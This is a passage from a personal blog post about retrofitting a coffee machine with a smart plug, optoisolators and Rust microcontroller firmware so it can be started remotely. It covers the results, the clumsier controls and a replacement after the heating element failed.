I added a “drain power supply” resistor on another of the GPIOs. This is enabled, with a draw of about 30mA, when the microcontroller is soon going to “off”/“on” cycle the coffee machine. That reduces the risk that the user will turn off the smart plug, and turn off the machine, but that the microcontroller turns the coffee machine back on again using the remaining power from USB PSU. Empirically in my setup it reduces the time from “smart plug off” to “microcontroller stops” from about 2-3s to more like 1s.
Optoisolator board (inside coffee machine) pictures(Click through for full size images.)
Microcontroller board (in USB-plug-ish housing) pictures Implementation - softwareI originally used the Arduino IDE, writing my program in C. I had a bad time with that and rewrote it in Rust.
The firmware is in a repository on Debian’s gitlab
ResultsI can now cause the coffee to start, from my phone. It can be programmed more than 12h in advance. And it stays warm until we’ve drunk it.
UI is worseThere’s one aspect of the original Morphy Richards machine that I haven’t improved: the user interface is still poor. Indeed, it’s now even worse:
To turn the machine on, you probably want to turn on the smart plug instead. Unhappily, the power button for that is invisible in its installed location.
In particular, in the usual case, if you want to turn it off, you should ideally turn off both the smart plug (which can be done with the button on it) and the coffee machine itself. If you forget to turn off the smart plug, the machine can end up being turned on, very briefly, a handful of times, over the next hour or two.
EpilogueWe had used the new features a handful of times when one morning the coffee machine just wouldn’t make coffee. The UI showed it turning on, but it wouldn’t get hot, so no coffee. I thought “oh no, I’ve broken it!”
But, on investigation, I found that the machine’s heating element was open circuit (ie, completely broken). I didn’t mess with that part. So, hooray! Not my fault. Probably, just being inverted a number of times and generally lightly jostled, had precipitated a latent fault. The machine was a number of years old.
Happily I found a replacement, identical, machine, online. I’ve transplanted my modification and now it all works well.
Bonus pictures(Click through for full size images.)
edited 2023-11-26 14:59 UTC in an attempt to fix TOC linkscomments